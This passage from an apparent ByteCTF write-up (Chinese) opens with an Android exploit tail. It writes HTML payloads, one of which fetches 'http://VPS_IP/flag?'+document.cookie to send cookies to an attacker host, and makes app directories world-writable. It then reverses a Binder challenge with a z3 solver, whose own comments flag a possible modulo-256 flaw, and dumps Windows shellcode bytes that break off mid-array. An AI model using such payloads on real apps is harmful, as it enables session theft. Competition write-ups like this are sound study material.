"echo '<html><head></head><body>1 page</body><script>window.location.href=\"http://tiktok.com/local_cache/..%2F..%2F..%2F..%2F../data/data/com.bytectf.pwnbytedroid1/files/3.html\";</script></html>' > /data/data/com.bytectf.pwnbytedroid1/files/1.html;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/files;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/files/1.html;" +
"echo '<html><head></head><body>3 page</body><script>fetch(\"http://VPS_IP/flag?\"+document.cookie)</script></html>' > /data/data/com.bytectf.pwnbytedroid1/files/3.html;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/files/3.html;"
});
} catch (IOException e) {
Log.d("AndroidRuntime","err",e);
e.printStackTrace();
}
}
Reverse
byteService
拿到APK文件后,使用Jadx-gui打开APK文件,发现应该是一个考察Binder机制的题目,transact()函数前面16次分别对应的code为1-16,每次transact时传递一个参数过去,当code为17时进行flag的check工作,那么非常明显对应的系统中有一个ByteCTFService的Binder服务端。
// Feeds the first 16 characters of the input to the service, one per call.
// i is incremented before callCTFService(), so the transaction codes run from
// 1 to 16. Only AssertionError is caught here and turned into `false`.
// NOTE(review): charAt() on an input shorter than 16 characters presumably
// throws IndexOutOfBoundsException, which this method does not catch - confirm.
public boolean checkText(EditText editText) {
int i = 0;
while (i < 16) {
try {
char charAt = editText.getText().charAt(i);
i++;
callCTFService(i, charAt);
} catch (AssertionError unused) {
return false;
}
}
return true;
}
// Sends one int to the "ByteCTFService" binder: i is the transaction code and
// i2 the payload, written after the interface token.
// The binder handle is obtained by calling getService() on
// android.os.ServiceManager through reflection.
// Reflection and remote failures are only printed; the method then returns
// normally, so the caller cannot tell that the call failed.
public void callCTFService(int i, int i2) {
try {
Class<?> cls = Class.forName("android.os.ServiceManager");
Parcel obtain = Parcel.obtain();
Parcel obtain2 = Parcel.obtain();
obtain.writeInterfaceToken("android.os.IByteCTFService");
obtain.writeInt(i2);
((IBinder) cls.getMethod("getService", String.class).invoke(cls.newInstance(), "ByteCTFService")).transact(i, obtain, obtain2, 0);
obtain2.readException();
} catch (RemoteException | ClassNotFoundException | IllegalAccessException | InstantiationException | NoSuchMethodException | InvocationTargetException e) {
e.printStackTrace();
}
}
// Asks the "ByteCTFService" binder for its verdict: transaction code 17 is
// sent with only the interface token, and the reply is read as a boolean after
// readException().
// Returns false when any of the listed reflection or remote exceptions is
// caught, so a failed call and a negative verdict look the same to the caller.
public boolean checkCTFService() {
try {
Class<?> cls = Class.forName("android.os.ServiceManager");
Parcel obtain = Parcel.obtain();
Parcel obtain2 = Parcel.obtain();
obtain.writeInterfaceToken("android.os.IByteCTFService");
((IBinder) cls.getMethod("getService", String.class).invoke(cls.newInstance(), "ByteCTFService")).transact(17, obtain, obtain2, 0);
obtain2.readException();
return obtain2.readBoolean();
} catch (RemoteException | ClassNotFoundException | IllegalAccessException | InstantiationException | NoSuchMethodException | InvocationTargetException e) {
e.printStackTrace();
return false;
}
}
那么通用的系统中肯定是没有相应的android.os.IByteCTFService的interface以及ByteCTFService的类的,再次观察题目提示会发现给了一个链接,打开网页后拖到最下面得到相应系统的镜像latest.zip文件。
一开始我想的是直接提取img中的文件,但是发现system.img不是ext4格式,也没有现成的模拟器的img的工具,所以选择将镜像跑起来吧。
使用AS自带的emulator指定下载的镜像启动模拟器,但是我这里最终一直处在开机状态幸好不影响adb,考虑到ByteCTFService的类名,我大致猜到对应的类在 /system/framework/目录的framework.jar和service.jar中,可以通过grep命令确认一下。
在提取出两个jar文件后,使用Jadx-gui打开后会发现存在一个A类封装了一批绕来绕去的Function函数,把我给绕晕了。。
暂时看不出来这个类的作用,但是在发现ByteCTFServiceImpl后你就会发现,大量引用了这个类中的函数。
回到正题,对应Binder机制的transact函数,首先看onTransact函数,其内容大致如下,这就对应了上述的分析“transact()函数前面16次分别对应的code为1-16,每次transact时传递一个参数过去,当code为17时进行flag的check工作,那么非常明显对应的系统中有一个ByteCTFService的Binder服务端。”
// Binder entry point of the service, as shown by the decompiler.
// INTERFACE_TRANSACTION answers with the interface descriptor. Codes 1-16 each
// check the descriptor, read one int from `data` and pass it to x1..x16.
// Code 17 checks the descriptor, calls check() and writes 1 or 0 to `reply`.
// Any other code is handed to super.onTransact().
public boolean onTransact(int code, Parcel data, Parcel reply, int flags) throws RemoteException {
switch (code) {
case IBinder.INTERFACE_TRANSACTION:
reply.writeString(IByteCTFService.DESCRIPTOR);
return true;
default:
switch (code) {
case 1:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x1(data.readInt());
reply.writeNoException();
return true;
case 2:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x2(data.readInt());
reply.writeNoException();
return true;
case 3:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x3(data.readInt());
reply.writeNoException();
return true;
case 4:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x4(data.readInt());
reply.writeNoException();
return true;
case 5:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x5(data.readInt());
reply.writeNoException();
return true;
case 6:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x6(data.readInt());
reply.writeNoException();
return true;
case 7:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x7(data.readInt());
reply.writeNoException();
return true;
case 8:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x8(data.readInt());
reply.writeNoException();
return true;
case 9:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x9(data.readInt());
reply.writeNoException();
return true;
case 10:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x10(data.readInt());
reply.writeNoException();
return true;
case 11:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x11(data.readInt());
reply.writeNoException();
return true;
case 12:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x12(data.readInt());
reply.writeNoException();
return true;
case 13:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x13(data.readInt());
reply.writeNoException();
return true;
case 14:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x14(data.readInt());
reply.writeNoException();
return true;
case 15:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x15(data.readInt());
reply.writeNoException();
return true;
case 16:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x16(data.readInt());
reply.writeNoException();
return true;
case 17:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
boolean check = check();
reply.writeNoException();
reply.writeInt(check ? 1 : 0);
return true;
default:
return super.onTransact(code, data, reply, flags);
}
}
}
分析1-16对应的x系列函数会发现其实就是初始化函数
而code为17对应的就是最终的check函数,跟到check函数会发现调用了check1-16函数,必须check1-16所有函数返回值都为true才能check成功,而每一个check函数一看又是一堆apply,放弃了分析内容,拷贝到Java工程中跑一跑吧。
又是一番波折,好不容易跑起来了,大概输入了几个x1-x16值测试了下,发现实际上就是一个多元一次方程,很容易想到z3约束求解,那么如何得到方程的参数呢?
将每个check1-16函数返回值类型修改为计算的结果而不是比较的结果,修改后的check函数将比较过程放到了最终的check函数中。
这里我用控制变量法发现,当控制x0-x16中任意一个变量变化,其他15个变量固定时,会发现每个check函数在其中一个变量增加1时,其计算出来的值也会相应的发生变化,且差值一定,且每个check函数应该是有一个初值。
以一元一次方程的通式aX+b = c为例,那么相应的差值就应该是相应x1-x16的系数a,初始值就是b,最终对比的结果就是c。
按照找出的规律结合z3进行求解,得到最终的exp:
from z3 import *
init = [717, 789, 846, 686, 977, 681, 911, 774,
902, 1035, 848, 711, 802, 810, 973, 757]
sub = [
[87, 92, 18, 55, 21, 93, 27, 19, 82, 60, 77, 24, 13, 88, 78, 69, ],
[65, 15, 77, 14, 74, 63, 46, 19, 1, 72, 48, 79, 70, 24, 81, 6, ],
[67, 33, 33, 22, 38, 68, 70, 16, 66, 11, 5, 23, 81, 66, 1, 60, ],
[83, 71, 96, 6, 67, 4, 11, 88, 53, 91, 1, 7, 66, 42, 23, 84, ],
[53, 32, 79, 44, 41, 7, 2, 73, 39, 5, 2, 7, 12, 91, 29, 47, ],
[26, 15, 35, 84, 84, 61, 68, 56, 69, 57, 91, 26, 78, 3, 30, 30, ],
[12, 72, 92, 32, 78, 26, 43, 34, 62, 7, 26, 37, 42, 51, 2, 72, ],
[33, 55, 66, 79, 84, 40, 54, 7, 32, 11, 36, 66, 89, 57, 72, 65, ],
[19, 81, 87, 78, 77, 64, 78, 26, 74, 33, 29, 37, 15, 43, 27, 40, ],
[10, 40, 6, 19, 35, 73, 27, 13, 10, 70, 93, 97, 47, 79, 86, 95, ],
[71, 5, 93, 11, 4, 52, 75, 76, 83, 50, 18, 27, 20, 17, 30, 64, ],
[16, 81, 53, 84, 95, 56, 92, 49, 29, 65, 37, 50, 15, 36, 66, 50, ],
[42, 14, 42, 41, 84, 45, 11, 7, 30, 66, 62, 15, 96, 94, 31, 58, ],
[55, 41, 82, 43, 71, 44, 15, 8, 5, 60, 40, 80, 90, 25, 75, 6, ],
[60, 35, 33, 90, 61, 12, 21, 100, 94, 74, 15, 46, 92, 48, 53, 66, ],
[65, 29, 74, 52, 8, 64, 75, 13, 11, 6, 87, 49, 79, 44, 77, 84, ]
]
# 右边等式
equal = [67099, 55163, 47068,
61311, 48233, 62631, 56441, 64310, 67996, 54361, 55525, 71867, 49587,
55422, 68978, 61502]
# Rebuild the 16 linear equations from `init`, `sub` and `equal`, then let z3
# solve for the 16 input characters.
if __name__ == '__main__':
from z3 import *
s = Solver()
# One 8-bit bit-vector per character.
# NOTE(review): with 8-bit operands z3py presumably coerces the integer
# constants to 8 bits as well, so each equation would be checked modulo 256
# rather than over the integers (every value in `equal` is above 255) - confirm.
# Wider bit-vectors plus an explicit 0..127 range constraint per character
# would state the intended system directly.
flag = [BitVec('flag[%d]' % i,8) for i in range(16)]
for i in range(16):
# Equation i: init[i] + sum(sub[i][j] * flag[j]) == equal[i]
temp = init[i]
for j in range(16):
temp += sub[i][j]*flag[j]
s.add(equal[i] == temp)
print(s.check())
print(s.model())
result = ""
for i in range(16):
result += chr(s.model()[flag[i]].as_long() & 127) # must AND with 127 here because Java's byte and Python's representation differ; a Java byte is 8 bits and signed
print("flag => ByteCTF{%s}" % result)
最终得到flag :
BabyHeaven
文件是一个函数的字节码,先用python提取成字符串形式然后放到自己的c文件中编译。
with open('BabyHeaven','rb+') as f:
s = f.read()
for c in s:
print('\\x'+hex(c)[2:],end='')
#include <stdio.h>
#include <Windows.h>
unsigned char function[] = "\x81\xec\xb4\x1\x0\x0\x66\xc7\x85\x4c\xff\xff\xff\x6b\x0\x66\xc7\x85\x4e\xff\xff\xff\x65\x0\x66\xc7\x85\x50\xff\xff\xff\x72\x0\x66\xc7\x85\x52\xff\xff\xff\x6e\x0\x66\xc7\x85\x54\xff\xff\xff\x65\x0\x66\xc7\x85\x56\xff\xff\xff\x6c\x0\x66\xc7\x85\x58\xff\xff\xff\x33\x0\x66\xc7\x85\x5a\xff\xff\xff\x32\x0\x66\xc7\x85\x5c\xff\xff\xff\x2e\x0\x66\xc7\x85\x5e\xff\xff\xff\x64\x0\x66\xc7\x85\x60\xff\xff\xff\x6c\x0\x66\xc7\x85\x62\xff\xff\xff\x6c\x0\x66\xc7\x85\x64\xff\xff\xff\x0\x0\xc6\x85\x3d\xff\xff\xff\x47\xc6\x85\x3e\xff\xff\xff\x65\xc6\x85\x3f\xff\xff\xff\x74\xc6\x85\x40\xff\xff\xff\x50\xc6\x85\x41\xff\xff\xff\x72\xc6\x85\x42\xff\xff\xff\x6f\xc6\x85\x43\xff\xff\xff\x63\xc6\x85\x44\xff\xff\xff\x41\xc6\x85\x45\xff\xff\xff\x64\xc6\x85\x46\xff\xff\xff\x64\xc6\x85\x47\xff\xff\xff\x72\xc6\x85\x48\xff\xff\xff\x65\xc6\x85\x49\xff\xff\xff\x73\xc6\x85\x4a\xff\xff\xff\x73\xc6\x85\x4b\xff\xff\xff\x0\xc6\x85\x30\xff\xff\xff\x4c\xc6\x85\x31\xff\xff\xff\x6f\xc6\x85\x32\xff\xff\xff\x61\xc6\x85\x33\xff\xff\xff\x64\xc6\x85\x34\xff\xff\xff\x4c\xc6\x85\x35\xff\xff\xff\x69\xc6\x85\x36\xff\xff\xff\x62\xc6\x85\x37\xff\xff\xff\x72\xc6\x85\x38\xff\xff\xff\x61\xc6\x85\x39\xff\xff\xff\x72\xc6\x85\x3a\xff\xff\xff\x79\xc6\x85\x3b\xff\xff\xff\x41\xc6\x85\x3c\xff\xff\xff\x0\xc6\x85\x22\xff\xff\xff\x47\xc6\x85\x23\xff\xff\xff\x65\xc6\x85\x24\xff\xff\xff\x74\xc6\x85\x25\xff\xff\xff\x53\xc6\x85\x26\xff\xff\xff\x79\xc6\x85\x27\xff\xff\xff\x73\xc6\x85\x28\xff\xff\xff\x74\xc6\x85\x29\xff\xff\xff\x65\xc6\x85\x2a\xff\xff\xff\x6d\xc6\x85\x2b\xff\xff\xff\x49\xc6\x85\x2c\xff\xff\xff\x6e\xc6\x85\x2d\xff\xff\xff\x66\xc6\x85\x2e\xff\xff\xff\x6f\xc6\x85\x2f\xff\xff\xff\x0\xc6\x85\x15\xff\xff\xff\x56\xc6\x85\x16\xff\xff\xff\x69\xc6\x85\x17\xff\xff\xff\x72\xc6\x85\x18\xff\xff\xff\x74\xc6\x85\x19\xff\xff\xff\x75\xc6\x85\x1a\xff\xff\xff\x61\xc6\x85\x1b\xff\xff\xff\x6c\xc6\x85\x1c\xff\xff\xff\x41\xc6\x85\x1d\xff\xff\xff\x6c\xc6\x85\x1e\xff\xff\xff\x6c\xc6\x85\x1f\xff\xff\xff\x6f\xc6\x85\x20\xff
\xff\xff\x63\xc6\x85\x21\xff\xff\xff\x0\xc6\x85\x6\xff\xff\xff\x56\xc6\x85\x7\xff\xff\xff\x69\xc6\x85\x8\xff\xff\xff\x72\xc6\x85\x9\xff\xff\xff\x74\xc6\x85\xa\xff\xff\xff\x75\xc6\x85\xb\xff\xff\xff\x61\xc6\x85\xc\xff\xff\xff\x6c\xc6\x85\xd\xff\xff\xff\x50\xc6\x85\xe\xff\xff\xff\x72\xc6\x85\xf\xff\xff\xff\x6f\xc6\x85\x10\xff\xff\xff\x74\xc6\x85\x11\xff\xff\xff\x65\xc6\x85\x12\xff\xff\xff\x63\xc6\x85\x13\xff\xff\xff\x74\xc6\x85\x14\xff\xff\xff\x0\xc6\x85\xfa\xfe\xff\xff\x45\xc6\x85\xfb\xfe\xff\xff\x78\xc6\x85\xfc\xfe\xff\xff\x69\xc6\x85\xfd\xfe\xff\xff\x74\xc6\x85\xfe\xfe\xff\xff\x50\xc6\x85\xff\xfe\xff\xff\x72\xc6\x85\x0\xff\xff\xff\x6f\xc6\x85\x1\xff\xff\xff\x63\xc6\x85\x2\xff\xff\xff\x65\xc6\x85\x3\xff\xff\xff\x73\xc6\x85\x4\xff\xff\xff\x73\xc6\x85\x5\xff\xff\xff\x0\xc6\x85\xe9\xfe\xff\xff\x47\xc6\x85\xea\xfe\xff\xff\x65\xc6\x85\xeb\xfe\xff\xff\x74\xc6\x85\xec\xfe\xff\xff\x4d\xc6\x85\xed\xfe\xff\xff\x6f\xc6\x85\xee\xfe\xff\xff\x64\xc6\x85\xef\xfe\xff\xff\x75\xc6\x85\xf0\xfe\xff\xff\x6c\xc6\x85\xf1\xfe\xff\xff\x65\xc6\x85\xf2\xfe\xff\xff\x48\xc6\x85\xf3\xfe\xff\xff\x61\xc6\x85\xf4\xfe\xff\xff\x6e\xc6\x85\xf5\xfe\xff\xff\x64\xc6\x85\xf6\xfe\xff\xff\x6c\xc6\x85\xf7\xfe\xff\xff\x65\xc6\x85\xf8\xfe\xff\xff\x57\xc6\x85\xf9\xfe\xff\xff\x0\xc6\x85\xd9\xfe\xff\xff\x55\xc6\x85\xda\xfe\xff\xff\x6e\xc6\x85\xdb\xfe\xff\xff\x6d\xc6\x85\xdc\xfe\xff\xff\x61\xc6\x85\xdd\xfe\xff\xff\x70\xc6\x85\xde\xfe\xff\xff\x56\xc6\x85\xdf\xfe\xff\xff\x69\xc6\x85\xe0\xfe\xff\xff\x65\xc6\x85\xe1\xfe\xff\xff\x77\xc6\x85\xe2\xfe\xff\xff\x4f\xc6\x85\xe3\xfe\xff\xff\x66\xc6\x85\xe4\xfe\xff\xff\x46\xc6\x85\xe5\xfe\xff\xff\x69\xc6\x85\xe6\xfe\xff\xff\x6c\xc6\x85\xe7\xfe\xff\xff\x65\xc6\x85\xe8\xfe\xff\xff\x0\xc6\x85\xce\xfe\xff\xff\x75\xc6\x85\xcf\xfe\xff\xff\x73\xc6\x85\xd0\xfe\xff\xff\x65\xc6\x85\xd1\xfe\xff\xff\x72\xc6\x85\xd2\xfe\xff\xff\x33\xc6\x85\xd3\xfe\xff\xff\x32\xc6\x85\xd4\xfe\xff\xff\x2e\xc6\x85\xd5\xfe\xff\xff\x64\xc6\x85\xd6\xfe\xff\xff\x6c\xc6\x85\xd7\xfe\xff\xff\x6c\xc6\x85\xd8\xfe\xff\
xff\x0\xc6\x85\xc2\xfe\xff\xff\x4d\xc6\x85\xc3\xfe\xff\xff\x65\xc6\x85\xc4\xfe\xff\xff\x73\xc6\x85\xc5\xfe\xff\xff\x73\xc6\x85\xc6\xfe\xff\xff\x61\xc6\x85\xc7\xfe\xff\xff\x67\xc6\x85\xc8\xfe\xff\xff\x65\xc6\x85\xc9\xfe\xff\xff\x42\xc6\x85\xca\xfe\xff\xff\x6f\xc6\x85\xcb\xfe\xff\xff\x78\xc6\x85\xcc\xfe\xff\xff\x41\xc6\x85\xcd\xfe\xff\xff\x0\x8d\x85\x4c\xff\xff\xff\x89\x45\x90\xc7\x45\x8c\x0\x0\x0\x0\x64\xa1\x30\x0\x0\x0\x89\x45\x8c\x8b\x45\x8c\x8b\x40\xc\x89\x45\x88\x8b\x45\x88\x83\xc0\x14\x89\x45\x84\x8b\x45\x84\x8b\x0\x89\x45\x80\xe9\xe4\x0\x0\x0\x8b\x45\x80\x83\xe8\x8\x89\x85\x7c\xff\xff\xff\x8b\x85\x7c\xff\xff\xff\x8b\x40\x30\x89\x85\x78\xff\xff\xff\x8b\x45\x90\x89\x85\x74\xff\xff\xff\x8b\x85\x78\xff\xff\xff\x89\x85\x70\xff\xff\xff\x8b\x85\x74\xff\xff\xff\x89\x85\x6c\xff\xff\xff\x8b\x85\x70\xff\xff\xff\x89\x85\x68\xff\xff\xff\xeb\x63\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x83\xf8\x40\x76\x1d\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x83\xf8\x5a\x77\xe\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x83\xc0\x20\xeb\x9\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x89\x85\x66\xff\xff\xff\x8b\x85\x6c\xff\xff\xff\xf\xb7\x0\x66\x39\x85\x66\xff\xff\xff\x74\x7\xb8\x0\x0\x0\x0\xeb\x2e\x83\x85\x6c\xff\xff\xff\x2\x83\x85\x68\xff\xff\xff\x2\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x85\xc0\x75\x8f\x8b\x85\x6c\xff\xff\xff\xf\xb7\x0\x66\x85\xc0\xf\x94\xc0\xf\xb6\xc0\x85\xc0\x74\xb\x8b\x85\x7c\xff\xff\xff\x8b\x40\x18\xeb\x19\x8b\x45\x80\x8b\x0\x89\x45\x80\x8b\x45\x84\x3b\x45\x80\xf\x85\x10\xff\xff\xff\xb8\x0\x0\x0\x0\x89\x45\xf4\x8b\x45\xf4\x89\x45\xc4\x8d\x85\x3d\xff\xff\xff\x89\x45\xc0\x8b\x45\xc4\x89\x45\xbc\x8b\x45\xbc\x8b\x40\x3c\x89\xc2\x8b\x45\xbc\x1\xd0\x89\x45\xb8\x8b\x45\xb8\x8b\x50\x78\x8b\x45\xc4\x1\xd0\x89\x45\xb4\x8b\x45\xb4\x8b\x50\x20\x8b\x45\xc4\x1\xd0\x89\x45\xb0\x8b\x45\xb4\x8b\x50\x1c\x8b\x45\xc4\x1\xd0\x89\x45\xac\x8b\x45\xb4\x8b\x50\x24\x8b\x45\xc4\x1\xd0\x89\x45\xa8\xc7\x45\xa4\x0\x0\x0\x0\xe9\x91\x0\x0\x0\x8b\x45\xa4\x8d\x14\x85\x0\x0\x0\x0\x8b\x45\xb0\x1\xd0\x8b\x10\x8b\x45\xc4\x1\x
d0\x89\x45\xa0\x8b\x45\xa4\x8d\x14\x0\x8b\x45\xa8\x1\xd0\xf\xb7\x0\xf\xb7\xc0\x8d\x14\x85\x0\x0\x0\x0\x8b\x45\xac\x1\xd0\x8b\x0\x89\x45\x9c\x8b\x45\xc0\x89\x45\x98\x8b\x45\xa0\x89\x45\x94\xeb\x8\x83\x45\x98\x1\x83\x45\x94\x1\x8b\x45\x94\xf\xb6\x10\x8b\x45\x98\xf\xb6\x0\x38\xc2\x75\xa\x8b\x45\x94\xf\xb6\x0\x84\xc0\x75\xde\x8b\x45\x98\xf\xb6\x10\x8b\x45\x94\xf\xb6\x0\x38\xc2\xf\x94\xc0\xf\xb6\xc0\x85\xc0\x74\xa\x8b\x55\xc4\x8b\x45\x9c\x1\xd0\xeb\x1a\x83\x45\xa4\x1\x8b\x45\xb4\x8b\x50\x14\x8b\x45\xa4\x39\xc2\xf\x87\x5e\xff\xff\xff\xb8\x0\x0\x0\x0\x89\x45\xf0\x8d\x85\x30\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xec\x8d\x85\x22\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe8\x8d\x85\x15\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe4\x8d\x85\x6\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe0\x8d\x85\xfa\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xbc\xfe\xff\xff\x8d\x85\xe9\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xdc\x8d\x85\xd9\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xb8\xfe\xff\xff\x8d\x85\xce\xfe\xff\xff\x89\x4\x24\x8b\x45\xec\xff\xd0\x83\xec\x4\x89\x45\xd8\x8d\x85\xc2\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xd8\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xb4\xfe\xff\xff\xc7\x4\x24\x0\x0\x0\x0\x8b\x45\xdc\xff\xd0\x83\xec\x4\x89\x45\xd4\x8d\x85\x90\xfe\xff\xff\x89\x4\x24\x8b\x45\xe8\xff\xd0\x83\xec\x4\x8b\x85\x94\xfe\xff\xff\x89\x45\xd0\xc7\x44\x24\xc\x4\x0\x0\x0\xc7\x44\x24\x8\x0\x10\x0\x0\x8b\x45\xd0\x89\x44\x24\x4\xc7\x4\x24\x0\x0\x0\x0\x8b\x45\xe4\xff\xd0\x83\xec\x10\x89\x45\xcc\x8b\x45\xcc\x89\x85\x8c\xfe\xff\xff\x8b\x45\xcc\xc6\x0\x6a\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x33\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0
\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xec\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\x89\x45\xc8\x81\x45\xcc\x0\x1\x0\x0\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x57\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xec\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xac\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0
\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xab\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\x